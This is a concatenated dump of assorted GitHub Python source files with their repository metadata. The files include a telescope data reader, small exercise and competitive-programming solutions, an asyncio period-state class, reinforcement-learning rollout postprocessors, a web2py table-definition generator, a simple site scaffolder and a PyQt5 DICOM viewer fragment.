pyhessio_file.get_mirror_area(tel_id) * u.m ** 2\n num_tiles = pyhessio_file.get_mirror_number(tel_id)\n tel_pos = pyhessio_file.get_telescope_position(tel_id) * u.m\n\n tel = TelescopeDescription.guess(*pix_pos, foclen)\n tel.optics.mirror_area = mirror_area\n tel.optics.num_mirror_tiles = num_tiles\n data.inst.subarray.tels[tel_id] = tel\n data.inst.subarray.positions[tel_id] = tel_pos\n\n # deprecated fields that will become part of\n # TelescopeDescription or SubrrayDescription\n data.inst.optical_foclen[tel_id] = foclen\n data.inst.pixel_pos[tel_id] = pix_pos\n data.inst.tel_pos[tel_id] = tel_pos\n\n nchans = pyhessio_file.get_num_channel(tel_id)\n npix = pyhessio_file.get_num_pixels(tel_id)\n data.inst.num_channels[tel_id] = nchans\n data.inst.num_pixels[tel_id] = npix\n data.inst.mirror_dish_area[tel_id] = mirror_area\n data.inst.mirror_numtiles[tel_id] = num_tiles\n\n geometry = camera_geometry\n patch_matrix = camera.patch_matrix\n cluster_7_matrix = camera.cluster_7_matrix\n cluster_19_matrix = camera.cluster_19_matrix\n\n data.inst.geom[tel_id] = geometry\n data.inst.cluster_matrix_7[tel_id] = cluster_7_matrix\n data.inst.cluster_matrix_19[tel_id] = cluster_19_matrix\n data.inst.patch_matrix[tel_id] = patch_matrix\n\n except HessioGeneralError:\n pass\n","repo_name":"cta-sst-1m/digicampipe","sub_path":"digicampipe/io/hessio.py","file_name":"hessio.py","file_ext":"py","file_size_in_byte":11780,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"19890003158","text":"from claseCarrera import Carrera\nfrom claseFacultad import Facultad\nfrom ManejadorFacultades import ManejadorFacultad\nfrom Menu import Menu\n\n\ndef test():\n pos=0\n Manejador = ManejadorFacultad()\n Manejador.CargarLista()\n Manejador.mostrarLista()\n Mod_Menu = Menu()\n Salir = True\n while Salir:\n print(\"Bienvenido al Menú\")\n print(\"1. Opción 1: Ingresar el código de una facultad y mostrar nombre de la facultad, nombre y duración de cada una de las carreras que se dictan en esa facultad\")\n print(\"2. Opción 2: Dado el nombre de una carrera, mostrar código (se conforma con número de código de Facultad y código de carrera), nombre y localidad de la facultad donde esta se dicta\")\n print(\"0. Salir\")\n opcion = input(\"Ingrese la opcion: \")\n if opcion =='1':\n codigo = float(input(\"Ingrese el codigo de una facultad: \"))\n Mod_Menu.opcion1(codigo)\n elif opcion =='2':\n nombre_carrera = str(input(\"Ingrese el nombre de la carrera: \"))\n Mod_Menu.opcion2(nombre_carrera)\n else:\n if (opcion == '0'):\n Salir = False\n Mod_Menu.salir()\n else:\n print (\"Opcion invalida\")\n Salir=False\n\n\nif __name__ == '__main__':\n test()\n\n ","repo_name":"CristianAlv/Unidad-3-2023","sub_path":"Ejercicio 1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73001633369","text":"# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n# 给定一个节点数为n的无序单链表,对其按升序排序。\n# 代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可\n#\n#\n# @param head ListNode类 the head node\n# @return ListNode类\n#\nclass Solution:\n def sortInList(self , head: ListNode) -> ListNode:\n # write code here\n tmp = []\n tmp.append(head.val)\n while head.next:\n head = head.next\n tmp.append(head.val)\n tmp.sort()\n result = ListNode(-1)\n temp = result\n for i in tmp:\n tt = ListNode(i)\n temp.next = tt\n temp = temp.next\n return result.next","repo_name":"lucifer726/leetcode_","sub_path":"链表/单链表的排序.py","file_name":"单链表的排序.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72637187289","text":"#!/usr/bin/python3\n# function to print and return last digit of a number\n\n\ndef print_last_digit(number):\n if number < 0:\n d = number % -10\n d = -d\n else:\n d = number % 10\n print(\"{:d}\".format(d), end=\"\")\n return (d)\n","repo_name":"blueExcess/holbertonschool-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/9-print_last_digit.py","file_name":"9-print_last_digit.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42446602896","text":"import asyncio\nimport datetime\n\n# todo 以后可以想想实现子集、并集、交集等,最小元素考虑是互斥时期\nfrom loguru import logger\n\n\nclass AsyncPeriod:\n def __init__(self, name, obj, gear):\n self._true_event = asyncio.Event()\n self._false_event = asyncio.Event()\n self._ensure_state(False)\n self._name = name\n self.obj = obj\n self.gear = gear\n\n self._slots_num_for_true = 1\n self._filled_slots_num = 0\n self._ensured_time = None\n\n @property\n def slots_num_for_true(self):\n return self._slots_num_for_true\n\n @slots_num_for_true.setter\n def slots_num_for_true(self, x: int):\n if self._slots_num_for_true != x: # 更新\n self.filled_slots_num = 0\n\n self._slots_num_for_true = x\n\n @property\n def filled_slots_num(self):\n return self._filled_slots_num\n\n @filled_slots_num.setter\n def filled_slots_num(self, x: int):\n self._filled_slots_num = x\n # 触发\n if self.filled_slots_num >= self.slots_num_for_true:\n self.gear.prev_period = self.gear.get_present_period()\n for period in self.gear.periods.values():\n period._ensure_state(period is self)\n self.gear._current_period = self\n logger.debug(f'set {repr(self.obj)} to period {self._name}.')\n\n self.filled_slots_num = 0\n\n def _ensure_state(self, state: bool):\n if state:\n if not self._true_event.is_set():\n self._true_event.set()\n self._ensured_time = datetime.datetime.utcnow()\n if self._false_event.is_set():\n self._false_event.clear()\n\n else:\n if self._true_event.is_set():\n self._true_event.clear()\n if not self._false_event.is_set():\n self._false_event.set()\n self._ensured_time = None\n\n def get_state(self):\n return self._true_event.is_set() and not self._false_event.is_set()\n\n async def wait_true(self):\n await asyncio.create_task(self._true_event.wait())\n\n async def wait_false(self):\n await asyncio.create_task(self._false_event.wait())\n\n async def wait_change_into_true(self):\n if self.get_state():\n await asyncio.create_task(self.wait_false())\n await asyncio.create_task(self.wait_true())\n else:\n await asyncio.create_task(self.wait_true())\n\n async def wait_change_into_false(self):\n if self.get_state():\n await asyncio.create_task(self.wait_false())\n else:\n await asyncio.create_task(self.wait_true())\n await asyncio.create_task(self.wait_false())\n\n # obj_has_async_exclusive_periods = {}\n #\n # @classmethod\n # def create_obj_periods(cls, obj, *period_names: str):\n # '''\n # Initially create periods for some object.\n #\n # :param obj:\n # :param period_names: Period names.The first one would be the initial period.\n # :return:\n # '''\n # if obj not in cls.obj_has_async_exclusive_periods.keys():\n # cls.obj_has_async_exclusive_periods[obj] = cls.obj_has_async_exclusive_periods.get(obj, {})\n # for period_name in period_names:\n # cls.obj_has_async_exclusive_periods[obj][period_name] = AsyncGear(period_name, obj)\n # cls._set_obj_period(obj, period_names[0])\n # else:\n # raise KeyError(f'{repr(obj)} has already got some periods! Please use add_period.')\n #\n # @classmethod\n # def add_period(cls, obj, new_period_name: str):\n # '''\n # Dynamically add a period for some object.\n #\n # :return:\n # '''\n # if obj not in cls.obj_has_async_exclusive_periods.keys():\n # cls.create_obj_periods(obj, new_period_name)\n # else:\n # cls.obj_has_async_exclusive_periods[obj][new_period_name] = AsyncGear(new_period_name, obj)\n #\n # @classmethod\n # def _get_obj_period(cls, obj, period_name: str):\n # if obj in cls.obj_has_async_exclusive_periods.keys() and \\\n # period_name in cls.obj_has_async_exclusive_periods[obj].keys():\n # return cls.obj_has_async_exclusive_periods[obj][period_name]\n # else:\n # raise KeyError(f'You did not create {period_name} for {repr(obj)}!')\n #\n # @classmethod\n # def get_obj_present_period(cls, obj):\n # for name, period in cls._get_obj_periods(obj).items():\n # if period._get_state():\n # return name\n #\n # @classmethod\n # def get_obj_period_names(cls, obj):\n # if obj in cls.obj_has_async_exclusive_periods.keys():\n # return cls.obj_has_async_exclusive_periods[obj].keys()\n # else:\n # raise KeyError(f'You did not create any AsyncGear for {repr(obj)}!')\n #\n # @classmethod\n # def _get_obj_periods(cls, obj):\n # if obj in cls.obj_has_async_exclusive_periods.keys():\n # return cls.obj_has_async_exclusive_periods[obj]\n #\n # @classmethod\n # def _set_obj_period(cls, obj, period_name: str):\n # if cls.get_obj_present_period(obj) != period_name:\n # for name, period in cls._get_obj_periods(obj).items():\n # # 目标\n # if name == period_name:\n # period._ensure_state(True)\n # else:\n # period._ensure_state(False)\n # logger.debug(f'set {repr(obj)} to period {period_name}.')\n #\n # @classmethod\n # async def set_obj_period(cls, obj, period_name: str, slot_num: int = 1):\n # '''\n # Set obj to period period_name.\n #\n # :param obj:\n # :param period_name:\n # :param slot_num: Attention! Do not use it if you do not understand it!\n # slot_num means that only after slot_num times AsyncGear.set_obj_period(obj,period_name,slot_num) run\n # (present time included), the period of obj gear could really be set to period_name, which is interrupted\n # if among these times set_obj_period run a different slot_num is given. Then the procedure is refreshed.\n # :return:\n # '''\n # p = cls._get_obj_period(obj, period_name)\n # p.slots_num_for_true = slot_num\n # p.filled_slots_num += 1\n #\n # # cls._set_obj_period(obj, period_name)\n # # if cls.get_obj_present_period(obj) != period_name:\n # # await asyncio.create_task(AsyncGear.wait_outside_period(obj, period_name))\n # # else:\n # # await asyncio.create_task(AsyncGear.wait_inside_period(obj, period_name))\n # # await asyncio.create_task(AsyncGear.wait_inside_period(obj, period_name))\n #\n # @classmethod\n # async def wait_inside_period(cls, obj, period_name: str):\n # period: cls = cls._get_obj_period(obj, period_name)\n # await asyncio.create_task(period._wait_true())\n #\n # @classmethod\n # async def wait_outside_period(cls, obj, period_name: str):\n # period: cls = cls._get_obj_period(obj, period_name)\n # await asyncio.create_task(period.wait_false())\n #\n # @classmethod\n # async def wait_enter_period(cls, obj, period_name: str):\n # period: cls = cls._get_obj_period(obj, period_name)\n # await asyncio.create_task(period.wait_change_into_true())\n #\n # @classmethod\n # async def wait_exit_period(cls, obj, period_name: str):\n # period: cls = cls._get_obj_period(obj, period_name)\n # await asyncio.create_task(period._wait_change_into_false())\n","repo_name":"monk-after-90s/AsyncGear","sub_path":"AsyncGear/AsyncPeriod.py","file_name":"AsyncPeriod.py","file_ext":"py","file_size_in_byte":7653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35687660478","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nsys.setrecursionlimit(100000)\r\n\r\nmemo = {}\r\ninput()\r\nshoes = [int(x) for x in input().split()]\r\n\r\ndef solve(i):\r\n if i in memo:\r\n return memo[i]\r\n if i < 0:\r\n ans = 0\r\n elif i == 0:\r\n ans = shoes[0]\r\n elif i == 1:\r\n ans = shoes[0] + shoes[1] - min(shoes[0], shoes[1]) / 2\r\n else:\r\n ans = min(solve(i - 1) + shoes[i], \\\r\n solve(i - 2) + shoes[i] + shoes[i - 1] - min(shoes[i], shoes[i - 1]) / 2, \\\r\n solve(i - 3) + shoes[i] + shoes[i - 1] + shoes[i - 2] - min(shoes[i], shoes[i - 1], shoes[i - 2]))\r\n memo[i] = ans\r\n return ans\r\n\r\nprint(\"{:.1f}\".format(solve(len(shoes) - 1)))","repo_name":"nathanlo99/dmoj_archive","sub_path":"done/dmopc16c1p3.py","file_name":"dmopc16c1p3.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1880614732","text":"\"\"\"\nEnvironment/VecEnvironment -> Episode (stacked or not) -> postprocessor -> offline dataset\n\"\"\"\nimport enum\nfrom typing import List\nimport numpy as np\nimport scipy.signal\n\nfrom malib.utils.typing import AgentID, Dict, PolicyID, Union, Callable\nfrom malib.utils.episode import Episode, EpisodeKey\nfrom malib.algorithm.common.policy import Policy\n\n\nclass PostProcessorType(enum.IntEnum):\n ADVANTAGE = 0\n GAE = 1\n ACCUMULATED_REWORD = 2\n\n\n# FIXME(ziyu): For loop for episodes at the beginning\ndef compute_acc_reward(\n episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n policy_dict: Dict[AgentID, Policy],\n) -> Dict[str, Dict[AgentID, np.ndarray]]:\n # create new placeholder\n for episode in episodes:\n # episode[EpisodeKey.ACC_REWARD] = {}\n\n for aid, data in episode.items():\n gamma = policy_dict[aid].custom_config[\"gamma\"]\n assert isinstance(\n data[EpisodeKey.REWARD], np.ndarray\n ), \"Reward must be an numpy array: {}\".format(data[EpisodeKey.REWARD])\n assert (\n len(data[EpisodeKey.REWARD].shape) == 1\n ), \"Reward should be a scalar at eatch time step: {}\".format(\n data[EpisodeKey.REWARD]\n )\n acc_reward = scipy.signal.lfilter(\n [1], [1, float(-gamma)], data[EpisodeKey.REWARD][::-1], axis=0\n )[::-1]\n data[EpisodeKey.ACC_REWARD] = acc_reward\n\n return episodes\n\n\ndef compute_advantage(\n episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n policy_dict: Dict[AgentID, Policy],\n last_r: Dict[AgentID, float],\n use_gae: bool = False,\n) -> Dict[str, Dict[AgentID, np.ndarray]]:\n episodes = compute_acc_reward(episodes, policy_dict)\n for agent_episode in episodes:\n for aid, policy in policy_dict.items():\n episode = agent_episode[aid]\n use_gae = policy.custom_config.get(\"use_gae\", False)\n use_critic = policy.custom_config.get(\"use_critic\", False)\n\n if use_gae:\n gamma = policy.custom_config[\"gamma\"]\n v = np.concatenate(\n [episode[EpisodeKey.STATE_VALUE], np.array([last_r[aid]])]\n )\n delta_t = episode[EpisodeKey.REWARD] + gamma * v[1:] - v[:-1]\n episode[EpisodeKey.ADVANTAGE] = scipy.signal.lfilter(\n [1], [1, float(-gamma)], delta_t[::-1], axis=0\n )[::-1]\n episode[EpisodeKey.STATE_VALUE_TARGET] = (\n episode[EpisodeKey.ADVANTAGE] + episode[EpisodeKey.STATE_VALUE]\n )\n else:\n v = np.concatenate(\n [episode[EpisodeKey.REWARD], np.array([last_r[aid]])]\n )\n acc_r = episode[EpisodeKey.ACC_REWARD]\n if use_critic:\n episode[EpisodeKey.ADVANTAGE] = (\n acc_r - episode[EpisodeKey.STATE_VALUE]\n )\n episode[EpisodeKey.STATE_VALUE_TARGET] = episode[\n EpisodeKey.ACC_REWARD\n ].copy()\n else:\n episode[EpisodeKey.ADVANTAGE] = episode[EpisodeKey.ACC_REWARD]\n episode[EpisodeKey.STATE_VALUE_TARGET] = np.zeros_like(\n episode[EpisodeKey.ADVANTAGE]\n )\n return episodes\n\n\ndef compute_gae(\n episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n policy_dict: Dict[AgentID, Policy],\n) -> Dict[str, Dict[AgentID, np.ndarray]]:\n last_r = {}\n for agent_episode in episodes:\n for aid, episode in agent_episode.items():\n dones = episode[EpisodeKey.DONE]\n if dones[-1]:\n last_r[aid] = 0.0\n else:\n # compute value as last r\n assert hasattr(policy_dict[aid], \"value_functon\")\n last_r[aid] = policy_dict[aid].value_function(episode, agent_key=aid)\n episodes = compute_value(episodes, policy_dict)\n episodes = compute_advantage(episodes, policy_dict, last_r=last_r, use_gae=True)\n return episode\n\n\ndef compute_value(\n episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n policy_dict: Dict[AgentID, Policy],\n):\n for episode in episodes:\n for aid, policy in policy_dict.items():\n episode[aid][EpisodeKey.STATE_VALUE] = policy.value_function(**episode[aid])\n return episodes\n\n\n# XXX(ming): require test\ndef copy_next_frame(\n episodes: List[Dict[AgentID, Dict[str, np.ndarray]]],\n policy_dict: Dict[AgentID, Policy],\n):\n for episode in episodes:\n for aid, agent_episode in episode.items():\n assert EpisodeKey.CUR_OBS in agent_episode, (aid, episode)\n agent_episode[EpisodeKey.NEXT_OBS] = agent_episode[\n EpisodeKey.CUR_OBS\n ].copy()\n\n if EpisodeKey.ACTION_MASK in agent_episode:\n agent_episode[EpisodeKey.NEXT_ACTION_MASK] = agent_episode[\n EpisodeKey.ACTION_MASK\n ].copy()\n\n if EpisodeKey.CUR_STATE in agent_episode:\n agent_episode[EpisodeKey.NEXT_STATE] = agent_episode[\n EpisodeKey.CUR_STATE\n ].copy()\n return episodes\n\n\ndef default_processor(\n episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n policy_dict: Dict[AgentID, Policy],\n) -> Dict[str, Dict[AgentID, np.ndarray]]:\n return episodes\n\n\ndef get_postprocessor(\n processor_types: List[\n Union[str, Callable[[Episode, Dict[AgentID, Policy]], Episode]]\n ]\n) -> Callable[[Episode, Dict[AgentID, Policy]], Episode]:\n for processor_type in processor_types:\n if callable(processor_type):\n yield processor_type\n # XXX(ming): we will allow heterogeneous processor settings\n elif processor_type == \"gae\":\n yield compute_gae\n elif processor_type == \"acc_reward\":\n yield compute_acc_reward\n elif processor_type == \"advantage\":\n yield compute_advantage\n elif processor_type == \"default\":\n yield default_processor\n elif processor_type == \"value\":\n yield compute_value\n elif processor_type == \"copy_next_frame\":\n yield copy_next_frame\n else:\n return ValueError(\"Disallowed processor type: {}\".format(processor_type))\n","repo_name":"luorq3/malib","sub_path":"malib/rollout/postprocessor.py","file_name":"postprocessor.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"40881818965","text":"import sys\nx, y = map(int, sys.stdin.readline().split())\nz = (y*100)//x\n\nif z >= 99:\n print(-1)\nelse:\n answer = 0\n l, r = 1, x\n while l <= r:\n mid = (l+r) // 2\n if (y+mid)*100 // (x+mid) <= z:\n l = mid + 1\n else:\n answer = mid\n r = mid - 1\n\n print(answer)\n","repo_name":"parkgr95/Algorithm-Baekjoon","sub_path":"PGR/1072.py","file_name":"1072.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13250825000","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ncreate_table_definition_file.py\n\nA script to create table definition files. An example table definition\nfile is:\n\n applications//databases/07e0a7454f3966e22c43693c8e02ebc2_mystuff.table\n\nThis script is meant to be a template. Copy and edit before using.\n\"\"\"\nimport argparse\nimport logging\nimport sys\nimport traceback\nfrom pydal.base import BaseAdapter\nfrom pydal._compat import hashlib_md5, pjoin, pickle\nfrom pydal._load import portalocker\nfrom gluon.dal import Field, Table, SQLCustomType\nfrom applications.zcomx.modules.argparse.actions import ManPageAction\nfrom applications.zcomx.modules.logger import set_cli_logging\n\nVERSION = 'Version 0.1'\nLOG = logging.getLogger('root')\n\n\nclass DubBaseAdapter(BaseAdapter):\n \"\"\"Class representing a DubBaseAdapter\"\"\"\n # pylint: disable=missing-docstring\n\n @classmethod\n def ALLOW_NULL(cls):\n # pylint: disable=invalid-name\n return ''\n\n @classmethod\n def file_open(cls, filename, mode='rb', lock=True):\n # to be used ONLY for files that on GAE may not be on filesystem\n if lock:\n fileobj = portalocker.LockedFile(filename, mode)\n else:\n # pylint: disable=unspecified-encoding\n # pylint: disable=consider-using-with\n fileobj = open(filename, mode, encoding='utf-8')\n return fileobj\n\n @classmethod\n def file_close(cls, fileobj):\n # to be used ONLY for files that on GAE may not be on filesystem\n if fileobj:\n fileobj.close()\n\n\ndef get_ftype(table, field):\n \"\"\"Get the ftype of a field.\"\"\"\n # pylint: disable=protected-access\n # pylint: disable=unused-variable\n # pylint: disable=invalid-name\n # pylint: disable=line-too-long\n field_name = field.name\n field_type = field.type\n self = DubBaseAdapter\n types = DubBaseAdapter.types\n tablename = table._tablename\n postcreation_fields = []\n TFK = {}\n\n if isinstance(field_type, SQLCustomType):\n ftype = field_type.native or field_type.type\n elif field_type.startswith(('reference', 'big-reference')):\n if field_type.startswith('reference'):\n referenced = field_type[10:].strip()\n type_name = 'reference'\n else:\n referenced = field_type[14:].strip()\n type_name = 'big-reference'\n\n if referenced == '.':\n referenced = tablename\n constraint_name = self.constraint_name(tablename, field_name)\n # if not '.' in referenced \\\n # and referenced != tablename \\\n # and hasattr(table,'_primarykey'):\n # ftype = types['integer']\n # else:\n try:\n rtable = db[referenced]\n rfield = rtable._id\n rfieldname = rfield.name\n rtablename = referenced\n except (KeyError, ValueError, AttributeError) as e:\n self.db.logger.debug('Error: %s' % e)\n try:\n rtablename, rfieldname = referenced.split('.')\n rtable = db[rtablename]\n rfield = rtable[rfieldname]\n except Exception as err:\n self.db.logger.debug('Error: %s', str(err))\n raise KeyError(\n 'Cannot resolve reference %s in %s definition' %\n (referenced, table._tablename)\n ) from err\n\n # must be PK reference or unique\n if getattr(rtable, '_primarykey', None) and rfieldname in rtable._primarykey or \\\n rfield.unique:\n ftype = types[rfield.type[:9]] % \\\n dict(length=rfield.length)\n # multicolumn primary key reference?\n if not rfield.unique and len(rtable._primarykey) > 1:\n # then it has to be a table level FK\n if rtablename not in TFK:\n TFK[rtablename] = {}\n TFK[rtablename][rfieldname] = field_name\n else:\n ftype = ftype + \\\n types['reference FK'] % dict(\n constraint_name=constraint_name, # should be quoted\n foreign_key=rtable.sqlsafe + ' (' + rfield.sqlsafe_name + ')',\n table_name=table.sqlsafe,\n field_name=field.sqlsafe_name,\n on_delete_action=field.ondelete)\n else:\n # make a guess here for circular references\n if referenced in db:\n id_fieldname = db[referenced]._id.sqlsafe_name\n elif referenced == tablename:\n id_fieldname = table._id.sqlsafe_name\n else: # make a guess\n id_fieldname = self.QUOTE_TEMPLATE % 'id'\n # gotcha: the referenced table must be defined before\n # the referencing one to be able to create the table\n # Also if it's not recommended, we can still support\n # references to tablenames without rname to make\n # migrations and model relationship work also if tables\n # are not defined in order\n if referenced == tablename:\n real_referenced = db[referenced].sqlsafe\n else:\n real_referenced = (referenced in db\n and db[referenced].sqlsafe\n or referenced)\n rfield = db[referenced]._id\n ftype_info = dict(\n index_name=self.QUOTE_TEMPLATE % (field_name + '__idx'),\n field_name=field.sqlsafe_name,\n constraint_name=self.QUOTE_TEMPLATE % constraint_name,\n foreign_key='%s (%s)' % (real_referenced, rfield.sqlsafe_name),\n on_delete_action=field.ondelete,\n )\n ftype_info['null'] = ' NOT NULL' if field.notnull else ''\n ftype_info['unique'] = ' UNIQUE' if field.unique else ''\n ftype = types[type_name] % ftype_info\n elif field_type.startswith('list:reference'):\n ftype = types[field_type[:14]]\n elif field_type.startswith('decimal'):\n precision, scale = list(map(int, field_type[8:-1].split(',')))\n ftype = types[field_type[:7]] % \\\n dict(precision=precision, scale=scale)\n elif field_type.startswith('geo'):\n if not hasattr(self, 'srid'):\n raise RuntimeError('Adapter does not support geometry')\n srid = self.srid\n geotype, parms = field_type[:-1].split('(')\n if geotype not in types:\n raise SyntaxError(\n 'Field: unknown field type: %s for %s'\n % (field_type, field_name))\n ftype = types[geotype]\n if self.dbengine == 'postgres' and geotype == 'geometry':\n if self.ignore_field_case is True:\n field_name = field_name.lower()\n # parameters: schema, srid, dimension\n dimension = 2 # GIS.dimension ???\n parms = parms.split(',')\n if len(parms) == 3:\n schema, srid, dimension = parms\n elif len(parms) == 2:\n schema, srid = parms\n else:\n schema = parms[0]\n ftype = \"SELECT AddGeometryColumn ('%%(schema)s', '%%(tablename)s', '%%(fieldname)s', %%(srid)s, '%s', %%(dimension)s);\" % types[geotype]\n ftype = ftype % dict(schema=schema,\n tablename=tablename,\n fieldname=field_name, srid=srid,\n dimension=dimension)\n postcreation_fields.append(ftype)\n elif field_type not in types:\n raise SyntaxError(\n 'Field: unknown field type: %s for %s' %\n (field_type, field_name)\n )\n else:\n ftype = types[field_type] % {'length':field.length}\n\n if not field_type.startswith(('id', 'reference', 'big-reference')):\n if field.notnull:\n ftype += ' NOT NULL'\n else:\n ftype += self.ALLOW_NULL()\n if field.unique:\n ftype += ' UNIQUE'\n if field.custom_qualifier:\n ftype += ' %s' % field.custom_qualifier\n return ftype\n\n\ndef man_page():\n \"\"\"Print manual page-like help\"\"\"\n print(\"\"\"\nOVERVIEW\n This script can be used to create table definition files.\n !! This script is meant to be a template. Copy and edit before using. !!\n\n An example table definition file is:\n\n applications//databases/07e0a7454f3966e22c43693c8e02ebc2_mystuff.table\n\n This script will not work with py_web2py.sh\n\nUSAGE\n !!! This script has hard coded values. Not intended to be used directly !!!\n\n 1. Copy script to temp script, and edit and use temp.script\n 2. Update tablename\n 2. Update table definition including all Field() definitions.\n 3. Remove all Field attributes *except*\n name\n type (string, integer, etc)\n length\n unique\n notnull\n ondelete\n custom_qualifier\n\n Then:\n python web2py.py -S app -R applications/app/private/bin/tmp/tmp_create_table_definition_file.py\n\nOPTIONS\n\n -h, --help\n Print a brief help.\n\n --man\n Print man page-like help.\n\n -v, --verbose\n Print information messages to stdout.\n\n -vv,\n More verbose. Print debug messages to stdout.\n\n --version\n Print the script version.\n \"\"\")\n\n\ndef main():\n \"\"\"Main processing.\"\"\"\n\n parser = argparse.ArgumentParser(prog='create_table_definition_file.py')\n\n parser.add_argument(\n '--man',\n action=ManPageAction, dest='man', default=False,\n callback=man_page,\n help='Display manual page-like help and exit.',\n )\n parser.add_argument(\n '-v', '--verbose',\n action='count', dest='verbose', default=False,\n help='Print messages to stdout.',\n )\n parser.add_argument(\n '--version',\n action='version',\n version=VERSION,\n help='Print the script version'\n )\n\n args = parser.parse_args()\n\n set_cli_logging(LOG, args.verbose)\n\n db = None\n\n app = 'app' # Replace with actual app name\n tablename = 'tablename' # Replace with actual table name\n table = Table(\n db,\n tablename,\n # Replace with actual Field() instances\n # Remove unneeded attributes. See --man\n Field('name'),\n Field(\n 'another_table_id',\n 'integer',\n ),\n Field('time_stamp', 'datetime'),\n )\n\n sql_fields = {}\n\n for sortable, field in enumerate(table, start=1):\n field_name = field.name\n field_type = field.type\n ftype = get_ftype(table, field)\n sql_fields[field_name] = dict(\n length=field.length,\n unique=field.unique,\n notnull=field.notnull,\n sortable=sortable,\n type=str(field_type),\n sql=ftype)\n\n dbpath = 'applications/{a}/databases'.format(a=app)\n adapter_uri = 'sqlite://{a}.sqlite'.format(a=app)\n\n uri_hash = hashlib_md5(adapter_uri).hexdigest()\n print('uri_hash: {var}'.format(var=uri_hash))\n\n # pylint: disable=protected-access\n table._dbt = pjoin(\n dbpath, '%s_%s.table' % (uri_hash, tablename))\n print('table._dbt: {var}'.format(var=table._dbt))\n\n if table._dbt:\n tfile = DubBaseAdapter.file_open(table._dbt, 'wb')\n pickle.dump(sql_fields, tfile)\n DubBaseAdapter.file_close(tfile)\n\n\nif __name__ == '__main__':\n # pylint: disable=broad-except\n try:\n main()\n except SystemExit:\n pass\n except Exception:\n traceback.print_exc(file=sys.stderr)\n sys.exit(1)\n","repo_name":"zcomx/zco.mx","sub_path":"applications/zcomx/private/bin/utils/create_table_definition_file.py","file_name":"create_table_definition_file.py","file_ext":"py","file_size_in_byte":11724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72460954967","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\n\nhtml_template = '''\n\n \n {title}\n \n \n \n \n'''\n\nsite_name = input(\"Site name: \")\nauthor = input(\"Author: \")\nmake_js_dir = input(\"Do you want a folder for Javascript? \") == \"y\"\nmake_css_dir = input(\"Do you want a folder for CSS? \") == \"y\"\n\nos.mkdir(site_name)\n\nwith open(os.path.join(site_name, \"index.html\"), \"w\") as fp:\n fp.write(html_template.format(title=site_name, author=author))\n\nif make_js_dir:\n os.mkdir(os.path.join(site_name, \"js\"))\nif make_css_dir:\n os.mkdir(os.path.join(site_name, \"css\"))\n","repo_name":"e0en/57_exercises","sub_path":"python/43_website_maker.py","file_name":"43_website_maker.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23217226586","text":"import numpy as np\nimport PyQt5\nfrom PyQt5.QtWidgets import (QApplication, QWidget,\n QPushButton, QVBoxLayout, QHBoxLayout, QLabel, QFileDialog,\n QDesktopWidget)\nfrom PyQt5.QtCore import QRect\nfrom PIL.ImageQt import ImageQt\nfrom PIL import Image\nfrom matplotlib.backends.backend_qt5agg import FigureCanvas\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nimport pydicom\n\nclass MyWidget(QWidget):\n def __init__(self):\n super(MyWidget, self).__init__()\n self.desk = QDesktopWidget()\n self.screen_geo = self.desk.screenGeometry(0)\n self.init_UI()\n \n def init_UI(self):\n vbox = QVBoxLayout()\n \n self.file_label = QLabel(\"Filename: \")\n self.file_btn = QPushButton(\"Choose file\")\n self.track_btn = QPushButton(\"Reconstruct tracks\")\n self.paht_btn = QPushButton(\"Estimate paths\")\n self.img_btn = QPushButton(\"Reconstruct image\")\n \n self.figure = Figure(figsize=(5, 3))\n self.canvas = FigureCanvas(self.figure)\n self.ax = self.figure.subplots()\n ds = pydicom.dcmread(\"/home/g0/Projects/pct/image/imgs/cp600.dcm\")\n image = self.ax.imshow(ds.pixel_array, cmap=plt.cm.bone) \n # self.ax.set_axis_off()\n \n vbox.addWidget(self.file_label)\n vbox.addWidget(self.file_btn)\n vbox.addWidget(self.track_btn)\n vbox.addWidget(self.paht_btn)\n vbox.addWidget(self.img_btn)\n vbox.addWidget(self.canvas)\n \n self.file_btn.clicked.connect(self.set_filename)\n \n self.setLayout(vbox)\n \n def set_filename(self):\n fdialog = QFileDialog()\n print(self.screen_geo.width())\n fdialog.setGeometry(QRect(self.screen_geo.width()/4,\n self.screen_geo.height() /4,\n self.screen_geo.width()/2,\n self.screen_geo.height()/2))\n fname = fdialog.getOpenFileName(self, 'Open file', \n './',\"ROOT files (*.root)\")\n if fname[0]:\n self.file_label.setText(fname[0])\n 